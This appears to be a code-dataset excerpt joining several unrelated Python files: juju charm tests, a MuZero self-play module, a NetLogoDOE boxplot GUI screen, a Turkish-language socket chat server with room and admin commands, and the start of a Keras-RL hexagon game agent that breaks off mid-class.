app = await model.deploy('cs:~juju-qa/bionic/upgrade-charm-resource-test-0')
await model.wait_for_idle(wait_for_units=1)
unit = app.units[0]
expected_message = 'I have no resource.'
assert unit.workload_status_message == expected_message
await app.upgrade_charm(revision=1)
await model.block_until(
lambda: unit.workload_status_message != 'I have no resource.',
timeout=60,
)
expected_message = 'My resource: I am the resource.'
assert app.units[0].workload_status_message == expected_message
@base.bootstrapped
@pytest.mark.asyncio
async def test_trusted(event_loop):
async with base.CleanModel() as model:
await model.deploy('cs:~juju-qa/bundle/basic-trusted-1', trust=True)
ubuntu_app = model.applications['ubuntu']
trusted = await ubuntu_app.get_trusted()
assert trusted is True
await ubuntu_app.set_trusted(False)
trusted = await ubuntu_app.get_trusted()
assert trusted is False
| 0.406862 | 0.264216 |
from ..utils.game_history import game_event_history
import torch
import numpy as np
from ..model.components import transform_input
from ..tree.temperture import *
def play_game(model, env, self_play=False, custom_end_function=None, custom_reward_function=None, custom_state_function=None, extra_loss_tracker=None, timeout_steps=100):
"""
    Plays a game with a given model
Parameters
----------
model : Muzero
the muzero model
env : gym.env
the environment
self_play : bool, optional
should self_play be used (not fully implemented), by default False
custom_end_function : callable, optional
        should a custom function be used for determining whether a game is done, by default None
custom_reward_function : callable, optional
should a custom function be used for the reward function, by default None
custom_state_function : callable, optional
        should a custom function be used to get the observation of the environment, by default None
extra_loss_tracker : callable, optional
        should a function calculate an extra loss, by default None
timeout_steps : int, optional
        max steps to take in the environment, by default 100
Returns
-------
game_event_history
        the events that took place in the game
"""
model.reset()
observation = env.reset()
game_history = game_event_history()
done = False
step = 0
temperature = 1
while not done and step < timeout_steps:
if self_play:
action, policy = model.think(observation)
best_action = action.item()
observation, reward, done = env.step(best_action)[:3]
game_history.add(
action=policy,
reward=None,
value=None,
state=None
)
else:
observation = custom_state_function(env) if custom_state_function is not None else observation
state = transform_input(observation)
info = extra_loss_tracker(env) if extra_loss_tracker else None
if model.use_naive_search:
best_action = model.plan_action_naive(state)
else:
legal_actions = getattr(env, "legal_actions", None)
legal_actions = legal_actions() if legal_actions is not None else None
if legal_actions is not None and len(legal_actions) == 0:
break
best_action = temperature_softmax(model.plan_action(state, legal_actions), T=(temperature), size=model.action_size)
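                # decay the exploration temperature so later moves are sampled more greedily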
temperature *= 0.9
observation, reward, done = env.step(best_action)[:3]
if custom_end_function is not None:
done = custom_end_function(env)
if custom_reward_function is not None:
reward = custom_reward_function(env, done)
game_history.add(
reward=torch.tensor([reward]).reshape((1, -1)),
action=best_action,
policy=None if model.use_naive_search else model.tree.get_policy(),
value=torch.tensor([1]).reshape((1, -1)) if not done else torch.tensor([0]).reshape((1, -1)),
state=state,
info=info
)
model.reset()
step += 1
return game_history
def selfplay_single_player(model, env, games=10):
"""
    Since the model is playing a single-player game,
    the self-play algorithm needs to be adjusted to account for this
Parameters
----------
model : muzero
muzero - since we are working with only one model (since it's single player) no need for model storage
env : gym.Env
the environment where the model will be playing
"""
history = []
for _ in range(games):
history.append(play_game(model, env, self_play=True))
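    # rank the finished games by total reward: the worse half contributes to the loss with a negative sign, the better half with a positive sign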
sorted_history = sorted(history, key=lambda x: x.historic_reward)
middle = len(sorted_history) // 2
bad_plays = sorted_history[:middle]
win_plays = sorted_history[middle:]
loss = 0
for player, sign in zip([bad_plays, win_plays], [-1, 1]):
for game in player:
for event in game.history:
loss += (sign * event.action).sum()
return loss
|
musweeper/musweeper/muzero/model/selfplay.py
|
from ..utils.game_history import game_event_history
import torch
import numpy as np
from ..model.components import transform_input
from ..tree.temperture import *
def play_game(model, env, self_play=False, custom_end_function=None, custom_reward_function=None, custom_state_function=None, extra_loss_tracker=None, timeout_steps=100):
"""
    Plays a game with a given model
Parameters
----------
model : Muzero
the muzero model
env : gym.env
the environment
self_play : bool, optional
should self_play be used (not fully implemented), by default False
custom_end_function : callable, optional
        should a custom function be used for determining whether a game is done, by default None
custom_reward_function : callable, optional
should a custom function be used for the reward function, by default None
custom_state_function : callable, optional
        should a custom function be used to get the observation of the environment, by default None
extra_loss_tracker : callable, optional
        should a function calculate an extra loss, by default None
timeout_steps : int, optional
        max steps to take in the environment, by default 100
Returns
-------
game_event_history
        the events that took place in the game
"""
model.reset()
observation = env.reset()
game_history = game_event_history()
done = False
step = 0
temperature = 1
while not done and step < timeout_steps:
if self_play:
action, policy = model.think(observation)
best_action = action.item()
observation, reward, done = env.step(best_action)[:3]
game_history.add(
action=policy,
reward=None,
value=None,
state=None
)
else:
observation = custom_state_function(env) if custom_state_function is not None else observation
state = transform_input(observation)
info = extra_loss_tracker(env) if extra_loss_tracker else None
if model.use_naive_search:
best_action = model.plan_action_naive(state)
else:
legal_actions = getattr(env, "legal_actions", None)
legal_actions = legal_actions() if legal_actions is not None else None
if legal_actions is not None and len(legal_actions) == 0:
break
best_action = temperature_softmax(model.plan_action(state, legal_actions), T=(temperature), size=model.action_size)
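                # decay the exploration temperature so later moves are sampled more greedily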
temperature *= 0.9
observation, reward, done = env.step(best_action)[:3]
if custom_end_function is not None:
done = custom_end_function(env)
if custom_reward_function is not None:
reward = custom_reward_function(env, done)
game_history.add(
reward=torch.tensor([reward]).reshape((1, -1)),
action=best_action,
policy=None if model.use_naive_search else model.tree.get_policy(),
value=torch.tensor([1]).reshape((1, -1)) if not done else torch.tensor([0]).reshape((1, -1)),
state=state,
info=info
)
model.reset()
step += 1
return game_history
def selfplay_single_player(model, env, games=10):
"""
    Since the model is playing a single-player game,
    the self-play algorithm needs to be adjusted to account for this
Parameters
----------
model : muzero
muzero - since we are working with only one model (since it's single player) no need for model storage
env : gym.Env
the environment where the model will be playing
"""
history = []
for _ in range(games):
history.append(play_game(model, env, self_play=True))
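    # rank the finished games by total reward: the worse half contributes to the loss with a negative sign, the better half with a positive sign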
sorted_history = sorted(history, key=lambda x: x.historic_reward)
middle = len(sorted_history) // 2
bad_plays = sorted_history[:middle]
win_plays = sorted_history[middle:]
loss = 0
for player, sign in zip([bad_plays, win_plays], [-1, 1]):
for game in player:
for event in game.history:
loss += (sign * event.action).sum()
return loss
| 0.794943 | 0.353484 |
import PySimpleGUI as sg
import plotly.graph_objects as go
from NetLogoDOE.src.gui.custom_components import title, question_mark_button, explanation
from NetLogoDOE.src.gui.custom_windows import show_help_window
from NetLogoDOE.src.gui.help_dictionary import help_text
from NetLogoDOE.src.util.data_processing.merge_standard_data import merge_data
class BoxplotScreen:
def __init__(self):
self.layout = [[title('Boxplot')],
[sg.Text('Graph Title: '), sg.Input(key='boxplot_title_input')],
[question_mark_button('boxplot_reporter_help_button'), sg.Text('Reporters to plot:')],
[sg.Multiline('', key='boxplot_reporter_input')],
[explanation('If this field is left empty, all reporters will be plotted.')],
[sg.Button('Generate', key='boxplot_generate_button')],
[sg.Button('Back', key='boxplot_back_button')]]
self.results = None
def check_events(self, event, values, window):
if event == 'standard_write_results_event':
self.results = values['standard_write_results_event']
if event == 'boxplot_generate_button':
self.generate_boxplot(values, window)
if event == 'boxplot_back_button':
window['boxplot_panel'].update(visible=False)
window['standard_result_panel'].update(visible=True)
# Help events
if event == 'boxplot_reporter_help_button':
show_help_window(help_text['standard_plot_reporters'],
location=(window.CurrentLocation()[0] - ((434 - window.size[0]) / 2),
window.CurrentLocation()[1] + 100))
def generate_boxplot(self, values, window):
reporters = self.format_reporters(values)
merged_data = merge_data(self.results[1], 1)
try:
[merged_data[reporter] for reporter in reporters]
except KeyError:
window.write_event_value('show_error_window', 'Error in input: Invalid reporter name.\nPlease make '
'sure all reporters are valid with the current run '
'configuration.')
return
fig = go.Figure()
for key in reporters:
fig.add_trace(go.Box(y=merged_data[key], name=key))
fig.update_layout(title_text=values['boxplot_title_input'],
yaxis_title_text='Value')
fig.show()
def format_reporters(self, values):
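        # a multiline input containing only a newline means the field was left empty, so every reporter is plotted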
if values['boxplot_reporter_input'] == '\n':
return list(self.results[1].keys())
reporters = list(filter(('').__ne__, values['boxplot_reporter_input'].split('\n')))
reporters = list(map(lambda x: x.strip(), reporters))
return reporters
|
NetLogoDOE/src/gui/plots/standard/BoxplotScreen.py
|
import PySimpleGUI as sg
import plotly.graph_objects as go
from NetLogoDOE.src.gui.custom_components import title, question_mark_button, explanation
from NetLogoDOE.src.gui.custom_windows import show_help_window
from NetLogoDOE.src.gui.help_dictionary import help_text
from NetLogoDOE.src.util.data_processing.merge_standard_data import merge_data
class BoxplotScreen:
def __init__(self):
self.layout = [[title('Boxplot')],
[sg.Text('Graph Title: '), sg.Input(key='boxplot_title_input')],
[question_mark_button('boxplot_reporter_help_button'), sg.Text('Reporters to plot:')],
[sg.Multiline('', key='boxplot_reporter_input')],
[explanation('If this field is left empty, all reporters will be plotted.')],
[sg.Button('Generate', key='boxplot_generate_button')],
[sg.Button('Back', key='boxplot_back_button')]]
self.results = None
def check_events(self, event, values, window):
if event == 'standard_write_results_event':
self.results = values['standard_write_results_event']
if event == 'boxplot_generate_button':
self.generate_boxplot(values, window)
if event == 'boxplot_back_button':
window['boxplot_panel'].update(visible=False)
window['standard_result_panel'].update(visible=True)
# Help events
if event == 'boxplot_reporter_help_button':
show_help_window(help_text['standard_plot_reporters'],
location=(window.CurrentLocation()[0] - ((434 - window.size[0]) / 2),
window.CurrentLocation()[1] + 100))
def generate_boxplot(self, values, window):
reporters = self.format_reporters(values)
merged_data = merge_data(self.results[1], 1)
try:
[merged_data[reporter] for reporter in reporters]
except KeyError:
window.write_event_value('show_error_window', 'Error in input: Invalid reporter name.\nPlease make '
'sure all reporters are valid with the current run '
'configuration.')
return
fig = go.Figure()
for key in reporters:
fig.add_trace(go.Box(y=merged_data[key], name=key))
fig.update_layout(title_text=values['boxplot_title_input'],
yaxis_title_text='Value')
fig.show()
def format_reporters(self, values):
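        # a multiline input containing only a newline means the field was left empty, so every reporter is plotted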
if values['boxplot_reporter_input'] == '\n':
return list(self.results[1].keys())
reporters = list(filter(('').__ne__, values['boxplot_reporter_input'].split('\n')))
reporters = list(map(lambda x: x.strip(), reporters))
return reporters
| 0.508544 | 0.181771 |
import socket
import threading
import queue
import time
class loggerThread(threading.Thread):
def __init__(self,loggerQueue,conn,addr):
threading.Thread.__init__(self)
self.loggerQueue = loggerQueue
self.conn = conn
self.addr = addr
def run(self):
logger(self.loggerQueue)
def logger(loggerQueue):
info = loggerQueue.get()
print(info.encode())
class writeThread(threading.Thread):
def __init__(self,threadID,conn,addr,workQueue):
threading.Thread.__init__(self)
self.threadID = threadID
self.conn = conn
self.addr = addr
self.workQueue = workQueue
def run(self):
while True:
request = self.workQueue.get()
self.conn.send(request.encode())
self.conn.close()
class readThread(threading.Thread):
def __init__(self,threadID,conn,addr,clientDict,pidDict,workQueue,roomDict):
threading.Thread.__init__(self)
self.threadID = threadID
self.conn = conn
self.addr = addr
self.clientDict = clientDict
self.pidDict = pidDict
self.workQueue = workQueue
self.roomDict= roomDict
def run(self):
parser(self.threadID,self.clientDict,self.pidDict,self.workQueue,self.conn,self.roomDict)
def parser(threadID,clientDict,pidDict,workQueue,conn,roomDict):
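    # Shared state:
    #   clientDict[name]  = [password, per-client write queue, list of joined rooms, logged-in flag]
    #   pidDict[threadID] = username registered on this connection
    #   roomDict[room]    = [list of admins, list of members, list of banned users]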
while True:
data = conn.recv(1024)
dataStr = data.decode().strip().split(":")
message = dataStr[0].split(" ")
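        # REG <user> <password>: register a new account, or update the password when the same logged-in user re-registers (password must be 4 digits)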
if message[0] == "REG":
if len(message) == 3:
req = ""
number =len(clientDict)
if number > 0:
if message[1] in clientDict:
if threadID in pidDict and pidDict[threadID] == message[1]:
if clientDict[message[1]][3] == True:
if len(message[2]) == 4:
try:
sifre = int(message[2])
req += "OKS (sifre guncellendi)\n"
clientDict[message[1]][0] = message[2]
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
except:
req += "REJN(sifre sadece sayilardan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (sifre 4 rakamdan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (baska isim kullan)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (baska isim kullan)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
#---------------------------------------
else:
if len(message[2]) == 4:
try:
sifre = int(message[2])
req += "WELN (kayıt olundu)"+message[1] + "\n"
clientDict[message[1]] = [1,2,[],False]
clientDict[message[1]][0] = message[2]
clientDict[message[1]][1] = workQueue
pidDict[threadID] = message[1]
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
except:
req += "REJN(sifre sadece sayilardan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (sifre 4 rakamdan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
#-----------------------------------------------------------------
else:
if len(message[2]) == 4:
try:
sifre = int(message[2])
req += "WELN (kayıt olundu) "+message[1] + "\n"
clientDict[message[1]] = [1,2,[],False]
clientDict[message[1]][0] = message[2]
clientDict[message[1]][1] = workQueue
pidDict[threadID] = message[1]
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
except:
req += "REJN(sifre sadece sayilardan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req += "REJN (sifre 4 rakamdan olusmalidir)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
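        # NIC <user> <password>: log in with an existing account (WEL on success, REJ on wrong password or unknown user)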
elif message[0] == "NIC":
if len(message) == 3:
req = ""
if message[1] in clientDict:
if message[2] == clientDict[message[1]][0]:
req += "WEL (giris yapildi)" + message[1] + "\n"
clientDict[message[1]][3] = True
else:
req += "REJ (sifre hatasi) "+ message[1] + "\n"
else:
req += "REJ (kullanici yok) " +message[1] + "\n"
#print(clientDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
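        # OAC <room>: create a new room; the creator becomes its admin (OKC on success, REJC if the name already exists)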
elif message[0] == "OAC":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if message[1] in roomDict:
req += "REJC " + message[1] + "\n"
else:
req += "OKC " + message[1] +"\n"
roomDict[message[1]] = [[],[],[]]
roomDict[message[1]][0].append(pidDict[threadID])
clientDict[name][2].append(message[1])
print(roomDict)
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
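        # GIR <room>: join an existing room; banned users get YSK, and everyone in the room is notified on success (OKO)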
elif message[0] == "GIR":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if message[1] in roomDict:
if clientDict[name][3] == True:
if name in roomDict[message[1]][2]:
req += "YSK (Engellenmisin)\n"
else:
req += "OKO (odaya giris yapildi)\n"
bildirim = name +" "+ message[1] + " odasina giris yapti\n"
clientDict[name][2].append(message[1])
roomDict[message[1]][1].append(name)
for i in roomDict[message[1]][1]:
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][0]:
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
else:
req += "YSK" + "giris yapilmamis\n"
else:
req += "YSK (oda yok)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
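        # QUI: log out; the server answers with BYE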
elif message[0] == "QUI":
name = pidDict[threadID]
clientDict[name][3] = False
queueLock.acquire()
queueList[threadID].put("BYE\n")
queueLock.release()
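        # PIN: keep-alive ping, answered with PON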
elif message[0] == "PIN":
queueLock.acquire()
queueList[threadID].put("PON\n")
queueLock.release()
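        # PRV <user>:<message>: send a private message to another logged-in user (OKP on delivery, NOP on failure)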
elif message[0] == "PRV":
if len(message) == 2:
name = pidDict[threadID]
if name in clientDict:
if clientDict[name][3] == True:
if message[1] in clientDict:
if clientDict[message[1]][3] == True:
if len(dataStr) == 2:
req =pidDict[threadID] + "->" + dataStr[1] + "\n"
adres = message[1]
queueLock.acquire()
clientDict[adres][1].put(req)
workQueue.put("OKP\n")
queueLock.release()
else:
req = "NOP (mesaj birakmadiniz)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOP (kullanici online degil)\n")
queueLock.release()
else :
req = "NOP " + message[1] + "\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req = "NOP (giris yap) \n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
req = "LRR \n"
queueLock.acquire()
queueList[threadID].put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
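        # GNL <room>:<message>: broadcast a message to all members and admins of a room the sender has joined (OKG / NOG)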
elif message[0] == "GNL":
if len(message) == 2:
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if name in roomDict[message[1]][1] or name in roomDict[message[1]][0] :
if len(dataStr) == 2:
queueLock.acquire()
workQueue.put("OKG\n")
queueLock.release()
for i in roomDict[message[1]][1]:
req = name + "->" + dataStr[1] + "\n"
queueLock.acquire()
clientDict[i][1].put(req)
queueLock.release()
for j in roomDict[message[1]][0]:
req = name + "->" + dataStr[1] + "\n"
queueLock.acquire()
clientDict[j][1].put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOG (mesaj birakmadiniz)\n")
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOG(grupta degilsin)\n")
queueLock.release()
else:
queueLock.acquire()
workQueue.put("NOG(oyle oda yok)\n")
queueLock.release()
#-----------------------
else:
queueLock.acquire()
workQueue.put("NOG(giris yapilmamis)\n")
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
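        # GOL: list the rooms this user has joined (NOK if none)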
elif message[0] == "GOL":
req = ""
name = pidDict[threadID]
if len(clientDict[name][2]) > 0:
for i in clientDict[name][2]:
req += i + ":"
else:
req += "NOK(girilen oda yok)"
req += "\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
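        # CIK <room>: leave a room and notify the remaining occupants (OKK on success, NOK otherwise)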
elif message[0] == "CIK":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if message[1] in roomDict:
if name in roomDict[message[1]][1]:
req += "OKK " + message[1] + "\n"
bildirim = name+" "+message[1] +" "+"odasindan cikis yapti\n"
roomDict[message[1]][1].remove(name)
clientDict[name][2].remove(message[1])
for i in roomDict[message[1]][1]:
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][0]:
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
elif name in roomDict[message[1]][0]:
req += "OKK " + message[1] + "\n"
bildirim = name+" "+message[1] +" "+"odasindan cikis yapti\n"
roomDict[message[1]][0].remove(name)
clientDict[name][2].remove(message[1])
for i in roomDict[message[1]][1]:
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][0]:
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
else:
req += "NOK (odada degilsin) \n"
else:
req += "NOK (oda yok) \n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "OLS":
req = "OLST "
name = pidDict[threadID]
if clientDict[name][3] == True:
for i in roomDict:
req += i + ":"
req += "\n"
else:
req += "NOLS Giris yapin"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
elif message[0] == "ENG":
if len(message) == 3:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if name in roomDict[message[1]][0]:
req += "OKE\n"
bildirim= message[1] + " odasından engellendiniz.\n"
roomDict[message[1]][2].append(message[2])
queueLock.acquire()
clientDict[message[2]][1].put(bildirim)
queueLock.release()
else:
req += "NOE(engel icin yonetici olmak lazim)\n"
else:
req += "NOE(boyle oda yok)\n"
else:
req += "NOE(giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "OKL":
if len(message) == 2:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if message[1] in clientDict[name][2]:
for i in roomDict[message[1]][1]:
req += i + ": normal\n"
for j in roomDict[message[1]][0]:
req += j + ": yonetici\n"
else:
req += "NOL(odada yoksun)\n"
else:
req += "NOL(oyle oda yok)\n"
else:
req += "NOL(giris yap) \n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "KAT":
if len(message) == 3:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if message[2] in roomDict[message[1]][1]:
if name in roomDict[message[1]][0]:
req += "OKT\n"
mesaj = message[1] + " odasindan atildiniz\n"
roomDict[message[1]][1].remove(message[2])
roomDict[message[1]][2].append(message[2])
clientDict[message[2]][2].remove(message[1])
queueLock.acquire()
clientDict[message[2]][1].put(mesaj)
queueLock.release()
else:
req += "REJT(engel icin yonetici olmak lazim)\n"
else:
req += "REJT(Odada boyle biri yok)\n"
else:
req += "REJT(boyle oda yok)\n"
else:
req += "REJT(giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "SIL":
if len(message)==2:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if name in roomDict[message[1]][0]:
req += "OKS\n"
bildirim = message[1] + " odasi silindi.\n"
for i in roomDict[message[1]][0]:
clientDict[i][2].remove(message[1])
queueLock.acquire()
clientDict[i][1].put(bildirim)
queueLock.release()
for j in roomDict[message[1]][1]:
clientDict[j][2].remove(message[1])
queueLock.acquire()
clientDict[j][1].put(bildirim)
queueLock.release()
del roomDict[message[1]]
else:
req += "OSS(yonetici olman lazim)\n"
else:
req += "OSS(boyle oda yok)\n"
else:
req += "OSS(giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
elif message[0] == "YON":
if len(message) == 3:
req = ""
name = pidDict[threadID]
if clientDict[name][3] == True:
if message[1] in roomDict:
if message[2] in roomDict[message[1]][1]:
roomDict[message[1]][1].remove(message[2])
roomDict[message[1]][0].append(message[2])
req += "OKY "+ message[2] +" yonetici yapildi.\n"
bildirim = message[1]+ " odasina yonetici yapildiniz\n"
queueLock.acquire()
clientDict[message[2]][1].put(bildirim)
queueLock.release()
else:
req += "NOY (boyle biri yok)\n"
else:
req += "NOY (boyle oda yok)\n"
else:
req += "NOY (giris yap)\n"
queueLock.acquire()
workQueue.put(req)
queueLock.release()
else:
queueLock.acquire()
workQueue.put("Arguman eksik ya da fazla\n")
queueLock.release()
else :
queueLock.acquire()
workQueue.put("ERR \n")
queueLock.release()
conn.close()
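# Shared state used by the threads above (structure inferred from the handlers):
#   clientDict[name]  -> [password, reply queue, list of joined rooms, logged-in flag]
#   roomDict[room]    -> [admin list, member list, banned list]
#   pidDict[threadID] -> user name registered on that connection
# Text protocol handled by parser(): REG (register), NIC (login), OAC (create room),
# GIR (join), CIK (leave), GNL (room message), PRV (private message), GOL (list my rooms),
# OLS (list all rooms), OKL (list room users), ENG (ban), KAT (kick), SIL (delete room),
# YON (promote to admin), PIN (ping), QUI (quit).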
s = socket.socket()
host = "0.0.0.0"
port = 8080
addr_ = (host, port)
s.bind(addr_)
s.listen(100)
counter = 0
queueList = []
readThreadList = []
writeThreadList = []
personDict = {}
personIdDict = {}
roomDict = {}
# One lock shared by every reader/writer thread; it must be created once, before the
# accept loop, so that all threads synchronise on the same object.
queueLock = threading.Lock()
while True:
    conn, addr = s.accept()
    workQueue = queue.Queue(100)
    queueList.append(workQueue)
    readThread_ = readThread(counter, conn, addr, personDict, personIdDict, workQueue, roomDict)
    writeThread_ = writeThread(counter, conn, addr, workQueue)
    readThreadList.append(readThread_)
    writeThreadList.append(writeThread_)
    readThread_.start()
    writeThread_.start()
    counter += 1
s.close()  # never reached: the accept loop above runs until the process is killed
|
proje/proje.py
|
| 0.037821 | 0.067547 |
from keras.layers import Flatten, Conv2D, Dense, Activation
from keras.optimizers import Adam
from keras import Sequential
from rl.agents import DQNAgent, CEMAgent
from rl.memory import SequentialMemory, EpisodeParameterMemory
from rl.policy import EpsGreedyQPolicy
from hexagon_agent import *
from random import shuffle
from multi_agent import *
import sys
import hexagon_ui_api
import os
import numpy as np
from ai_gym import *
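# Names used below but not defined here (HierarchicalCentaurEnv, menu(), AgentType,
# MultiAgent, MultiProcessor, CentaurDecisionProcessor, CentaurAttackProcessor and the
# alias `r`) are provided by the wildcard imports above from hexagon_agent, multi_agent
# and ai_gym.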
# ______________________________________________________________________________________________________________________________
class EnvDef:
centaur_name = 'centaur'
game_name = '1'
HASH_POOL = 10000
NODE_FEATURE_COUNT = 5
DECISION_ACTION_SPACE = 2
SHORT_MEMORY_SIZE = 1
MAX_ROUND = 2000
CELL_FEATURE = 1
MAX_GRID_LENGTH = 5
SPATIAL_INPUT = (MAX_GRID_LENGTH, MAX_GRID_LENGTH)
SPATIAL_OUTPUT = (MAX_GRID_LENGTH * MAX_GRID_LENGTH, )
EPISODE_REWARD = 1000
MOVE_REWARD_MULTIPLIER = 10
DONT_OWN_MOVE_REWARD = -5
CANT_ATTACK_MOVE_REWARD = -3
GAME_VERBOSE = False
RADIUS = 3
# __________________________________________________________________________________________________________________________
class NoneZeroEpsGreedyQPolicy(EpsGreedyQPolicy):
"""Implement the epsilon greedy policy
Eps Greedy policy either:
- takes a random action with probability epsilon from Non-Zero Q-values
- takes current best action with prob (1 - epsilon)
"""
def __init__(self, eps=.1):
super(EpsGreedyQPolicy, self).__init__()
self.eps = eps
def select_action(self, q_values):
"""Return the selected action
# Arguments
q_values (np.ndarray): List of the estimations of Q for each action
# Returns
Selection action
"""
assert q_values.ndim == 1
nb_actions = q_values.shape[0]
if np.random.uniform() < self.eps:
copy_q_values = np.copy(q_values)
idx = np.argmax(q_values)
copy_q_values[idx] = 0
for i in range(0, nb_actions):
val = copy_q_values[i]
copy_q_values[i] = -1e8 if val == 0 else val * np.random.uniform()
action = np.argmax(copy_q_values)
else:
action = np.argmax(q_values)
return action
def get_config(self):
"""Return configurations of EpsGreedyPolicy
# Returns
Dict of config
"""
config = super(EpsGreedyQPolicy, self).get_config()
config['eps'] = self.eps
return config
# __________________________________________________________________________________________________________________________
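# DQNAgent variant that lets a processor mask the Q-values before action selection, so
# actions that are invalid in the current game state can be suppressed. The object passed
# as mask_processor is expected to expose a mask(q_values) method (as the attack
# processor wired up in __main__ appears to).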
class MaskableDQNAgent(DQNAgent):
def __init__(self, model, policy=None, test_policy=None, enable_double_dqn=True, enable_dueling_network=False,
dueling_type='avg', mask_processor=None, *args, **kwargs):
DQNAgent.__init__(self, model, policy=policy, test_policy=test_policy,
enable_double_dqn=enable_double_dqn, enable_dueling_network=enable_dueling_network,
dueling_type=dueling_type, *args, **kwargs)
self.mask_processor = mask_processor
def forward(self, observation):
# Select an action.
state = self.memory.get_recent_state(observation)
q_values = self.compute_q_values(state)
if self.mask_processor is not None:
q_values = self.mask_processor.mask(q_values)
if self.training:
action = self.policy.select_action(q_values=q_values)
else:
action = self.test_policy.select_action(q_values=q_values)
# Book-keeping.
self.recent_observation = observation
self.recent_action = action
return action
# __________________________________________________________________________________________________________________________
class DecisionModel:
def __init__(self, modelName=None):
"""
    :type modelName: str
"""
self.modelName = modelName if modelName is not None else 'Decision_model_params.h5f' + str(r.uniform(0, 10000))
model = Sequential()
model.add(Flatten(input_shape=(1,) + (EnvDef.HASH_POOL * EnvDef.NODE_FEATURE_COUNT * EnvDef.SHORT_MEMORY_SIZE,)))
model.add(Dense(32, activation="relu"))
model.add(Dense(16, activation="relu"))
model.add(Dense(EnvDef.DECISION_ACTION_SPACE))
model.add(Activation('softmax'))
print(model.summary())
model.compile(loss="categorical_crossentropy",
optimizer='adadelta', metrics=['accuracy'])
self.model = model
# ______________________________________________________________________________________________________________________________
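# Three alternative architectures for the attack head: a plain dense network
# (SimplestAttackModel), a small conv net (SimpleAttackModel, the one wired up in
# __main__ below) and a deeper conv net (AttackModel, which also carries the reshape
# helpers prepare_x/prepare_y/process_y).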
class SimplestAttackModel:
def __init__(self, modelName=None):
"""
    :type modelName: str
"""
self.modelName = modelName if modelName is not None else 'Attack_model_params.h5f' + str(r.uniform(0, 10000000))
model = Sequential()
model.add(Flatten(
input_shape=EnvDef.SPATIAL_INPUT + (1, ), name='INPUT_ATTACK'))
model.add(Dense(256, activation='relu'))
model.add(Dense(128, activation='relu'))
model.add(Dense(EnvDef.SPATIAL_OUTPUT[0], activation='softmax'))
self.model = model
class SimpleAttackModel:
def __init__(self, modelName=None):
"""
    :type modelName: str
"""
self.modelName = modelName if modelName is not None else 'Attack_model_params.h5f' + str(r.uniform(0, 10000000))
model = Sequential()
model.add(Conv2D(64, (3, 3), padding='same', activation='relu',
input_shape=EnvDef.SPATIAL_INPUT + (1, ), name='INPUT_ATTACK'))
model.add(Conv2D(16, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(1, (1, 1), padding='same', activation='tanh'))
model.add(Flatten())
model.add(Dense(EnvDef.SPATIAL_OUTPUT[0], activation='tanh'))
self.model = model
class AttackModel:
def __init__(self, modelName=None):
"""
    :type modelName: str
"""
